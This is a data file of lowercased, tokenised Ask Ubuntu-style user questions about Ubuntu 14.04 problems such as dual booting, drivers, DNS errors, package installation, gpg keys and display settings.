483119	tuxlol patch on play on linux : invalid directory	i am following this howto described by renatov to install lol on ubuntu 14.04 i did as shown in the same tutorial i think.. so i get to the patching part : mono tuxlol.exe patch -- dir `` ~/.playonlinux/wineprefix/leagueoflegends/dosdevices/c : /riot games/league of legends '' mono tuxlol.exe patch -- dir `` ~/.playonlinux/wineprefix/leagueoflegends/drive_c/riot games/league of legends '' i have tried both lines separately . what i get when i run either is : the specified directory is invalid . i 've triple checked the path to both folders ( where tuxlol was extracted to and where lol is installed ) . what am i missing here ? ? edit : no idea why this worked now , since i had not before ran the command like so : mono tuxlol.exe patch -- dir ~/.playonlinux/wineprefix/leagueoflegends/dosdevices/c : /riot\ games/league\ of\ legends/ and patch was succesful . i was sure i had tried this already.. maybe i did n't , go figure.. going to continue his tutorial . edit ( 06/21 ) : patch applied sucsessfuly.. however , i can not fidn this folder : /.playonlinux/wineprefix/ [ virtualdrivename ] /drive_c/riot games/league of legends/rads/solutions/lol_game_client_sln/releases/ [ 0.0.0.xxx ] /deploy/data/menu/hud so cant apply corrections for store and shop . any other way to do this ?
483120	kde desktop installation on ubuntu is not working	i recently downloaded and installed kde-desktop on my ubuntu 14.04 64 bit desktop with the terminal command sudo apt-get install kubuntu-desktop but my unity theme stays on and i ca n't change it to kde desktop . can anybody suggest me a way to do it ?
483122	deluge and aufs mounted drives	i have an issue with deluge 1.3.6 , saving torrents to joint drives by aufs - when one of joint drive is out of space , second one is not used for storage and deluge stops with error . i 'm joining 2 drives in aufs as follows ( in file rc.local ) : mount -t aufs -o br : /media/nas3=rw : /media/nas4=rw -o sum -o udba=reval -o create=mfsrr:10000000 none /media/nas when copying files to the joint drive thru smb , or in krusader , aufs looks to be working properly - it shares files between drives , starting from the most empty drive . but when it comes to deluge , the only initial drive is used . tried this with 2 , 3 and 4 drives , joint in aufs . drives are mounted in fstab as following : nas3 on /dev/sdc1 uuid=de8f40ca-94bc-41f7-a93b-9f1a9c0d899a /media/nas3 ext4 users , exec , dev , suid , rw 0 0 nas4 on /dev/sdd1 uuid=d1be4e64-cae1-4d2b-9838-3ab5e9b9398f /media/nas4 ext4 users , exec , dev , suid , rw 0 0 thanks in advance .
483124	how to fix transient dns resolution errors ?	i 'm running into an issue with dns resolution failing for no reason , for example : ssh : could not resolve hostname bitbucket.org : name or service not known . when i retry a command , eventually the problem goes away , but i 'd like to have it fixed permanently . my /etc/resolv.conf is : nameserver 127.0.0.1 nameserver 8.8.8.8 nameserver 213.186.33.99
483126	crashing sound , very strange !	the sound usually worked on windows , now i to with ubuntu ( alias liked that much ) and the sound works only 50 % of the normal volume , more than that the sound is giving lag ... ... researching learned to go in and alsamixer along with the audio settings side by side , i saw that the more increased the volume blinked faster the surround , center and lfe ( in alsamixer ) and the configurations of the sound where the player must select 2 ( analog and digital ) , and when increases flashes : analog headset ( as if he had some phone in pc ) . in alsamixer saw a `` automute '' option , and have disabled and effect decreased by half , and surround , center and lfe continue flashing , and the headset 1 . has some way to fix the sound , for not blinking ? 2 . if you do not have , is to block out the sound for at most 50 % ? i 'm enjoying the other ubuntu , not want to have to go back to windows , helps ae ! ps : i just saw that only flashes when you have sound . my sound card is realtek ... ( sorry for my bad english )
483128	raknet library how to install	i 'm trying to install raknet library on linux without results what i did : wget http : //www.raknet.net/raknet/downloads/raknet_pc-4.082.zip unzip raknet_pc-4.082.zip cd raknet_pc-4.082 cd source cmake .. make sudo make install but it did n't install raknet library , what can i do ? best regards
483129	what is difference between these command ?	what is difference between these command : i used cd $ home/directory/test/ before running each lines : cd ~ cd / cd ~/ cd - cd -- cd / . cd $ home cd $ usr and all of these do the same behavior . what is difference ?
483132	why does installing kubuntu-desktop prompt me to remove `` lpr '' ?	i want to install the full kubuntu desktop from the software centre , when i hit install it pops out a window that says `` to install kubuntu-desktop , these items must be removed : '' with this package listed below . i do n't really know much about this package but i want to know the reason why kubuntu-desktop wants to remove it . also i wan na make sure that removing this package wo n't affect unity 's features or whatever .
483135	what commands should i use ?	my computer ( hp pavilion dv7 ) does not start correctly , but it at least shows me a list of commands to enter . for example : thierry-hp-pavilion-dv7-notebook-pc login : ( thierry = my session name ) so i get the name of the session . then password . i enter the password . then thierry @ thierry-hp-pavilion-dv7-notebook-pc : ~ $ and i do not know what to enter next . how do i get my computer to start correctly so i can login to my normal desktop environment ?
483137	fix for hp 1012 printer error message `` unsupported personality : pcl '' ?	ubuntu 12.04 . hp laserjet 1012 prints error message `` unsupported personality : pcl '' . causes every job to print an extra page , otherwise prints fine . apparently problem is this printer does not fully understand pcl5 language ( written by hp ! ) , got that from a windoze help site . hoping a different driver , or printer settings might solve the problem . one workaround is to turn off printer occasionally to dump print buffer , this works but i 've only just tried it , wonder if there is a better fix . i found a few posts for this problem from 2005 or 2006 on other linux help sites . ca n't find any current fixes .
483138	can not dual boot windows 7 and ubuntu 14.04 in my gigabyte q2542c laptop	i have a gigabyte q2542c laptop ( i5 3210m,4gb,750gb ) . first i tried installing windows 7 ultimate 64 bit version and then trying to install ubuntu 14.04 . but in install screen it says no operating system is detected and my total hard disk is free . but windows 7 is already there . there i got stuck . so i fully formatted the hard disk , installed windows 7 , and checked again.same results . so i did a clean install of ubuntu without having windows , hoping to install windows later . ubuntu was installed successfully . but when try to install windows , it says can not install to the partition because of its on gpt partition table . anybody has any idea what is going on ? is there a solution ? i need both os for my studies . thank you .
483143	problem with installing ubuntu on intel ssd	i have acer predator with preinstalled win 8.1 . i tried to install the latest version of ubuntu over win 8 on my intel ssd , and when i finished the ubuntu installation , and rebooted i got this message : reboot and select proper boot device or insert boot media ... . i have second sata 2tb hdd .
483145	plug-in installation problem	when i am trying to install required plug-ins to play music , the following notice is coming : failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/libd/libdvdread/libdvdread4_4.2.0+20121016-1ubuntu1.1_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/libd/libdvdnav/libdvdnav4_4.2.0+20130225-1ubuntu0.1_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/libm/libmad/libmad0_0.15.1b-7ubuntu2_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/l/lame/libmp3lame0_3.99.5+repack1-3_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/m/mpeg2dec/libmpeg2-4_0.5.1-5_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/o/opencore-amr/libopencore-amrnb0_0.1.3-2_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/o/opencore-amr/libopencore-amrwb0_0.1.3-2_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/x/x264/libx264-123_0.123.2189+git35cf912-1_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/a/a52dec/liba52-0.7.4_0.7.4-16build1_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/libs/libsidplay/libsidplay1_1.36.59-5_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/t/twolame/libtwolame0_0.3.13-1build1_i386.deb 403 forbidden failed to fetch http : /bd.archive.ubuntu.com/ubuntu/pool/universe/g/gst-plugins-ugly1.0/gstreamer1.0-plugins-ugly_1.0.6-1_i386.deb 403 forbidden what should i do now ? ... .and is there any better music player than rhythmbox ? ( i had to cut off one '/ ' after every http , cause i am not allowed to post more than 2 links .
483146	ubuntu 14.04 showing a black screen on startup	i have installed ubuntu 14.04 on dual boot with windows vista a week ago and it was running fine . but suddenly it has started showing a black screen on startup . i have tried the nomodeset method but it does n't work too . please help .
483148	is it possible to convert suse linux device drivers to ubuntu 's ?	i have a `` hp probook 450 g1 '' netbook , for which there are some drivers in a linux section of its support page . all of the downloads there are marked to be for `` suse linux '' . so , my question is simple : is it possible to convert those suse linux device drivers to be used in ubuntu 14.04 and if it is , how ?
483153	how can i add an account to the sudo list ?	i tried using this command in the terminal : sudo adduser liam sylvester sudo but all it says is `` only one or two names allowed . '' my version is 12.04 . does anyone have a solution ?
483155	howto enable output from intel graphics card having nvidia drivers activated	i want to know how to activate my second graphics card . the nvidia output is working well , but the second monitor ( which is connected to the intel card ) does n't work . i installed the intel drivers with the graphic installer . my configuration has n't nothing to do with optimus chips , just a nvidia graphic card connected to a pci port , and an integrated intel graphic card into the mainboard . thanks in advance .
483158	grub not appearing after upgrade to windows 8.1	i had previously dual-booted ubuntu 13.10 with windows 8 . then i upgraded it to windows 8.1 . since then my grub has not been appearing . i started ubuntu from my bootable usb drive and ran boot repair . it initially restored the grub . i even upgraded it to 14.04 . the grub appears as long as i keep using ubuntu . even if i once start windows from the grub , the grub menu does not appear on the next boot . it directly loads windows . here is the link to my boot info summary http : //paste.ubuntu.com/7643346
483161	how to skip installation of a debian package if a file exist in the system ?	i 'm interesting in avoiding the installation of the content of a debian package when a file is present in the system , eg . /usr/local/bin/token . i 'd like than the debian package will look for the token in the pre-installation phase ( preinst ? ) and decide to install or not the content afterwards , maybe i could just delete the content to avoid copying anything .
483162	there are no repos	i have pc engines apu . i wanted to install linux to apu over pxe . i m trying to install this on ubuntu 14.04 lts . i am using ubuntu 14.04 lts # yum install tftp-server syslinux httpd dhcpd there are no enabled repos . run `` yum repolist all '' to see the repos you have . you can enable repos with yum-config-manager -- enable < repo > # yum repolist all repolist : 0
483165	what is the cause of root 's being 100 % ?	i have a 5-yr old ubuntu laptop . it 's running 12.04 lts , and has never given me much if any trouble . last night while updating , a disk analyzer popped up , and said i had very little space left . it was correct . since then , i 've been manually cleaning up old kernels and their related files under /boot . i 'm down from 95 % to 89 % . i 've looked under /var/spool and cleaned up many , but not very large spool files that never printed from a long time ago . the disk analyzer just points to root at 100 % , showing /usr at 45 % and a trickle for everything else including /home . i checked with synaptic . i do n't have big packages installed like apache or mysql . what else could be filling up the disk and how should i approach the clean-up other than a brute force install ? i am using this script # ! /bin/bash orphans=`deborphan` if [ ! -z `` $ orphans '' ] ; then dpkg -- remove $ orphans fi purges=`dpkg -- list | grep ^rc | awk ' { print $ 2 ; } '` if [ ! -z `` $ purges '' ] ; then dpkg -- purge $ purges fi that i found here . however , this has only taken root down to 88 % , and adding deborphan added 1 % , when i had to install it .
483166	should i use ubuntu os on a new laptop supplied without an os ?	i am looking at purchasing a new laptop without an operating system from pcspecialists , but they will not advise me as to whether it will be ok to use ubuntu os . can someone please advise if it is ok to use ubuntu ? the laptop specification is : chassis & display : 15.6 '' matte hd led 16:9 widescreen ( 1366x768 ) processor ( cpu ) : intel® pentium® quad core processor n3520 ( 4 x 2.16ghz ) 2mb cache memory ( ram ) : 4gb kingston sodimm ddr3 1600mhz ( 1 x 4gb ) graphics card : integrated intel® hd graphics memory - hard disk : 500gb serial ata ii 2.5 '' hard drive with 8mb cache ( 5,400rpm ) dvd/blu-ray drive : ultra slim 8x sata dvd±r/rw/dual layer ( + 24x cd-rw ) memory card reader : internal 9 in 1 card reader ( mmc/rsmmc/sd : mini , xc & hc/ms : pro & duo ) sound card : intel 2 channel high definition audio + mic/headphone jack bluetooth & wireless : gigabit lan & wireless intel® n-7260 ( 300mbps , 802.11bgn ) + bluetooth usb options : 3 x usb 2.0 ports + 1 x usb 3.0 port as standard battery : genesis series 32wh battery ( up to 9.5 hour battery life ) operating system : no operating system required keyboard language : genesis series integrated uk keyboard notebook mouse : integrated 2 button touchpad mouse webcam : integrated 1mp hd webcam
483174	thinkpad t440p docking station : no sound on external speakers	using ubuntu 14.04 when i plug external speakers into the pro docking station with my thinkpad t440p in it i get no sound ( internal speakers mute ) . plugging the same speakers into the internal jack works fine the following solution i found several places online but it did not work after restarting my machine . added the line options snd-hda-intel model=thinkpad to the /etc/modprobe.d/alsa-base.conf .
483175	how do i list the contents of a package ?	how do i list the contents of a package that i just installed ? this command : dpkg -- contents filename.deb requires that i know where the .deb file is . i do n't feel like i need to know that , and if i do , please tell me where they go when i do apt-get install .
483178	ubuntu high cpu usage	i have a acer aspire v5-552g laptop , all seems to work fine but some software , in particular games and graphics are over using the cpu . such as cheese , here is the top output : pid user pr ni virt res shr s % cpu % mem time+ command 4479 dan 20 0 1610892 73900 32404 s 124.0 1.0 0:19.38 cheese i know that games and software that require more power can be like these but still i think there is a problem.installing the fglrx drivers does not solve anything , i also tried to install the latest fglrx beta , when i rebooted one core was always at 100 % in certain aps such as system settings , chrome ...
483186	unable to install php5-mcrypt on ubuntu 14.04	i ca n't install php5-mcrypt on ubuntu 14.04 . i 'm doing this : $ sudo apt-get install php5-mcrypt and getting this : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-mcrypt
483187	winff ( ffmpeg ) : unknown encoder 'libvo_aacenc '	when i try to convert a video - specifically , a video object ( `` .vob '' ) file - to mpeg-4 , winff which i assume is a frontend for ffmpeg and avconv , but it tells me : `unknown encoder 'libvo_aacenc'` the full text from terminal is : avconv version 9.13-6:9.13-0ubuntu0.14.04.1 , copyright ( c ) 2000-2014 the libav developers built on may 9 2014 13:34:03 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) [ mpeg @ 0x1924160 ] max_analyze_duration reached input # 0 , mpeg , from '/media/gregoryopera/movies/get a horse ! .vob ' : duration : 00:00:04.37 , start : 0.221156 , bitrate : 631225 kb/s stream # 0.0 [ 0x1e0 ] : video : mpeg2video ( main ) , yuv420p , 720x576 [ par 64:45 dar 16:9 ] , 9800 kb/s , 25 fps , 25 tbr , 90k tbn , 50 tbc stream # 0.1 [ 0x20 ] : subtitle : dvdsub stream # 0.2 [ 0x21 ] : subtitle : dvdsub stream # 0.3 [ 0x22 ] : subtitle : dvdsub stream # 0.4 [ 0x23 ] : subtitle : dvdsub stream # 0.5 [ 0x24 ] : subtitle : dvdsub stream # 0.6 [ 0x25 ] : subtitle : dvdsub stream # 0.7 [ 0x26 ] : subtitle : dvdsub stream # 0.8 [ 0x27 ] : subtitle : dvdsub stream # 0.9 [ 0x28 ] : subtitle : dvdsub stream # 0.10 [ 0x29 ] : subtitle : dvdsub stream # 0.11 [ 0x2a ] : subtitle : dvdsub stream # 0.12 [ 0x2b ] : subtitle : dvdsub stream # 0.13 [ 0x80 ] : audio : ac3 , 48000 hz , 5.1 , fltp , 384 kb/s stream # 0.14 [ 0x81 ] : audio : ac3 , 48000 hz , stereo , fltp , 192 kb/s stream # 0.15 [ 0x82 ] : audio : ac3 , 48000 hz , 5.1 , fltp , 384 kb/s stream # 0.16 [ 0x83 ] : audio : ac3 , 48000 hz , 5.1 , fltp , 384 kb/s stream # 0.17 [ 0x84 ] : audio : ac3 , 48000 hz , 5.1 , fltp , 384 kb/s unknown encoder 'libvo_aacenc' press enter to continue* when i press `` enter '' , terminal closes and my conversion is canceled . and before anyone says it - i did find the other answer relating to this same question here on ask ubuntu ... however that guy compiled it from scratch , which i do not want to do ( for a start , i would n't know where to begin ! ) ...
483194	desktop disappear after installing cuda in ubuntu14.04	i successfully install cuda as following tips : installing and testing cuda in ubuntu 14.04 and i also blacklisted those in /etc/modprobe.d/blacklist.conf : blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv but now when i log in the system i found my desktop disappear ( the top and the left bars are gone ) ! the mouse can be moved but the right click does work .
483196	i am unable to generate a gpg key through the keyring program	whenever i try to generate a gpg key through the system 's gpg program , it asks for my name , email , and password then everything except for the gpg program 's main window disappears . upon using gpg key-gen gpg : ca n't open `/home/jesse/.gnupg/random_seed ' : permission denied we need to generate a lot of random bytes . it is a good idea to perform some other action ( type on the keyboard , move the mouse , utilize the disks ) during the prime generation ; this gives the random number generator a better chance to gain enough entropy . gpg : warning : some openpgp programs ca n't handle a dsa key with this digest size +++++++++++++++..++++++++++ ... +++++++++++++++.+++++..+++++.+++++.++++++++++.+++++++++++++++..+++++.++++++++++++++++++++.++++++++++++++++++++++++++++++.+++++.+++++.+++++ ... +++++ > +++++ ... +++++++++++++++++++++++++..+++++++++++++++ > .+++++ > +++++ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. > .+++++ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ..+++++ not enough random bytes available . please do some other work to give the os a chance to collect more entropy ! ( need 300 more bytes ) gpg : no writable public keyring found : eof key generation failed : eof gpg : note : random_seed file not updated
483197	confusion regarding *.desktop files : okular.desktop appears multiple times in nautilus // okular.desktop vs. okularapplication____.desktop	source of confusion regarding *.desktop files , see screenshot below , multiple files of almost exact same size and exact same ( modification ) date , same-but-different ? here 's a screenshot of the properties , ( seems to be ) same for all : view > visible columns ... also leads to no-where promising ... but , lo and behold , in terminal the ls command reveals some arcane differences : now i was actually only interested in locating and identifying the one-and-only ( ? ) okular.desktop file , not all the other okularapplication_ { xxxxxx } .desktop files . how ? and what 's the story of the other files ? edit copied desktop files to non-system folder : nautilus reveals more info ... ( which does n't help from within /usr/share/applications/ )
483198	cant find ubuntu 14.04 lts machine on local network from windows 7 machine	i recently installed the windows file sharing service on my ubuntu 14.04 lts machine . however after restarting my session , and even a reboot ( which was not requested ) , i am still unable to locate my ubuntu machine on my local network from my windows 7 machine . it just does n't show up in `` network '' . on a related note , i have no problem browsing my windows 7 machines from ubuntu . curious . what might be the problem ?
483199	installing ubuntu to external hd - mount/unmount ?	hello everyone , i wish to install ubuntu to my external usb hard drive . when i choose the something else option , the installer detects both my internal drive ( sda ) and my external drive ( sdb ) . the installer wants me to unmount both of them but unmounting sda drive is dangerous ? i have read articles stating that you must disconnect sda first . i do n't want to touch the sda drive . is there another way to install ubuntu to the external drive ? if i unmount sda , will that not cause the internal drive to fail to boot to windows ?
483203	xrandr operates do n't save after reboot	i use ubuntu14.04 , with geforce 220 installed . i do n't install nvidia driver and do n't want too ( please don'ot tell me install nvidia driver ) .follow this link nvidia dvi/vga problem .i success make the dual monitor have the same resolution . but after reboot , it come out none of the selected modes were compatible with the possible modes : trying modes for crtc 95 crtc 95 : trying mode 1024x768 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 95 : trying mode 800x600 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 95 : trying mode 800x600 @ 56hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 95 : trying mode 848x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 95 : trying mode 640x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 95 : trying mode 1024x768 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 95 : trying mode 800x600 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 95 : trying mode 800x600 @ 56hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 95 : trying mode 848x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 95 : trying mode 640x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) trying modes for crtc 96 crtc 96 : trying mode 1024x768 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 96 : trying mode 800x600 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 96 : trying mode 800x600 @ 56hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 96 : trying mode 848x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 96 : trying mode 640x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 0 ) crtc 96 : trying mode 1024x768 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 96 : trying mode 800x600 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 96 : trying mode 800x600 @ 56hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 96 : trying mode 848x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) crtc 96 : trying mode 640x480 @ 60hz with output at 1280x1024 @ 60hz ( pass 1 ) xrandr show screen 0 : minimum 320 x 200 , current 2304 x 1024 , maximum 8192 x 8192 dvi-i-1 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi-1 disconnected ( normal left inverted right x axis y axis ) vga-1 connected 1280x1024+1024+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 so i redo it again 1 cvt 1280 1024 60 # 1280x1024 59.89 hz ( cvt 1.31m4 ) hsync : 63.67 khz ; pclk : 109.00 mhz modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync 2 xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync 3 addmode xrandr -- addmode dvi-i-1 `` 1280x1024_60.00 '' this time i do n't use xrandr -- output dvi-i-1 -- mode `` 1280x1024_60.00 '' , it already work . xrandr screen 0 : minimum 320 x 200 , current 2560 x 1024 , maximum 8192 x 8192 dvi-i-1 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1280x1024_60.00 59.9* hdmi-1 disconnected ( normal left inverted right x axis y axis ) vga-1 connected 1280x1024+1280+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 and my problem is , after reboot it will recover again . the litte problem is why it has refresh rate with 59.9 not 60 as i input ? why tring modes error becase i save ~/.config/monitors.xml < configuration > < clone > no < /clone > < output name= '' dvi-i-1 '' > < vendor > ? ? ? < /vendor > < product > 0x0000 < /product > < serial > 0x00000000 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' hdmi-1 '' > < /output > < output name= '' vga-1 '' > < vendor > del < /vendor > < product > 0xa04b < /product > < serial > 0x33343849 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 60 < /rate > < x > 1280 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < /configuration > < /monitors > i find xrandr is for runtime setting . it is normal the monitor is not working after reboot ( i think can do these command before gnome-setting-daemon , put this command in .bashrc ? ) .
483205	/etc/group - group on last line not usable ? is it a bug ?	$ cat -net /etc/group | tail -n 3 67 vboxusers : x:127 : hannu $ 68 nvidia-persistenced : x:128 : $ 69 $ $ a ) with the lines as shown i get the profiling ( system settings > color > calibrate ) for the main display only ( i have four of them ! i.e . not full functionality ) loaded as i log in . the group on line 68 is vital for xorg-edgers nvidia driver ( nvidia-337 and nvidia-settings installed ) b ) if i swap lines 67 and 68 i will not get to access usb devices in virtualbox 4.3 ( .12 has a remedied `` shared cliboard '' compared to 4.3.10 - which is availble in u.s.c . - i have tried both ) . from this i conclude that the last line in the /etc/groups file is n't read / used as it should . the empty line ( # 69 ) does n't matter as it seems to me . comments ? $ groups -- version groups ( gnu coreutils ) 8.21 copyright ( c ) 2013 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later . this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . written by david mackenzie and james youngman .
483206	installing lubuntu 14.04 on an hp omnibook 6100	i would like to install lubuntu 14.04 on an hp omnibook with a pentium 3 and 384mb of ram and 10gb hdd , i would like to know if it is possible to install this new versions on old computers or i would have to install an old non-pae version of ubuntu , i can install via the alternative ubuntu install or core install , thank you .
483210	compose key stopped working	the compose key was working fine for me using the us keyboard with italian characters key mapping . it worked in lightdm and it worked in gnome . i would press ralt-e and i would get ă¨ . then recently it changed . lightdm still works , but when in gnome it became two key strokes : ralt-~e . then a few days ago , one of my user ids decided to stop working entirely . compose key behaves like a normal alt key . but only in one user id ; my other user id still works . i have xkboptions= '' compose : ralt '' in /etc/default/keyboard . ( i think that 's why lightdm works . ) i went to the keyboard settings and tried to set the compose key . i noticed it had been set to disabled , but setting it to any key does nothing . in the dconf editor i have org.gnome.desktop.input-sources set to [ 'compose : ralt ' ] . what else should i look at ? what files , including in $ home , does gnome use to determine compose key behavior ? ? thanks !
483214	why does .gnupg belong to root ?	what is the purpose for the .gnupg directory belonging to root . my system will not allow me to write to the directory b/c of it . are there any security concerns with changing this ?
483216	how to uninstall with apt-get ?	i ran this command : sudo apt-get install gtk2-engines-murrine : i386 gtk2-engines-pixbuf : i386 sni-qt : i386 but now i want to remove what i 've just installed . what 's the command ?
483221	nautilus stops working in 14.04	i 'm using ubuntu 14.04 lts . sometimes when i start my computer , it shows system error , natilus stops working . and while i typed sudo nautilus from terminal , it shows ( nautilus:4260 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . is this may be a problem ? if so , how can i fix it ?
483224	what is terminal initialization by reset command ?	what is terminal initialization by reset command ? when should reset command be used ?
483229	dell 5537 touchpad not working ( ubuntu 14.04 )	after upgrading my new ubuntu from 12.04 to 14.04 i found out that touchpad is not working . strange thing is that it seems to be detected , as : cat /proc/bus/input/devices gives i : bus=0011 vendor=0002 product=0007 version=01b1 n : name= '' synps/2 synaptics touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input5 u : uniq= h : handlers=mouse1 event5 b : prop=1 b : ev=b b : key=e520 30000 0 0 0 0 b : abs=660800011000003 and also xinput gives ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb multi-smart mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] also details of touchpad in xinput look fine : xinput -- watch-props 12 gives device 'synps/2 synaptics touchpad ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 263 ) : 0 device accel constant deceleration ( 264 ) : 1.000000 device accel adaptive deceleration ( 265 ) : 1.000000 device accel velocity scaling ( 266 ) : 10.000000 device product id ( 253 ) : 2 , 7 device node ( 254 ) : `` /dev/input/event5 '' evdev axis inversion ( 267 ) : 0 , 0 evdev axis calibration ( 268 ) : < no items > evdev axes swap ( 269 ) : 0 axis labels ( 270 ) : `` abs mt position x '' ( 288 ) , `` abs mt position y '' ( 289 ) , `` abs mt pressure '' ( 290 ) , `` abs tool width '' ( 287 ) , `` none '' ( 0 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 271 ) : `` button left '' ( 137 ) , `` button unknown '' ( 256 ) , `` button right '' ( 139 ) , `` button wheel up '' ( 140 ) , `` button wheel down '' ( 141 ) evdev middle button emulation ( 272 ) : 0 evdev middle button timeout ( 273 ) : 50 evdev third button emulation ( 274 ) : 0 evdev third button emulation timeout ( 275 ) : 1000 evdev third button emulation button ( 276 ) : 3 evdev third button emulation threshold ( 277 ) : 20 evdev wheel emulation ( 278 ) : 0 evdev wheel emulation axes ( 279 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 280 ) : 10 evdev wheel emulation timeout ( 281 ) : 200 evdev wheel emulation button ( 282 ) : 4 evdev drag lock buttons ( 283 ) : 0 it`s worth mentioning that external mouse works correctly . also , in window `` settings > mouse and touchpad '' there are no settings for touchpad , only speed of double click regulation . i would be grateful for any help
483233	change directory structure from /year/month/day/ to /year-month-day	i need to change my directory structure for my photos from /year/month/day/ to /year-month-day i know this can sort of be done with exiftool , but it will only work on files containing exif-tags , and i have xmp-sidecar files corresponding to each image , and these need come along too . so i recon script of some kind would be the best way . i sat down and tried to learn regex , sed , bash and what not , and given enough time , i guess i should be able to figure this one out , but right now i am in a hurry , so any help would be appreciated . //ola
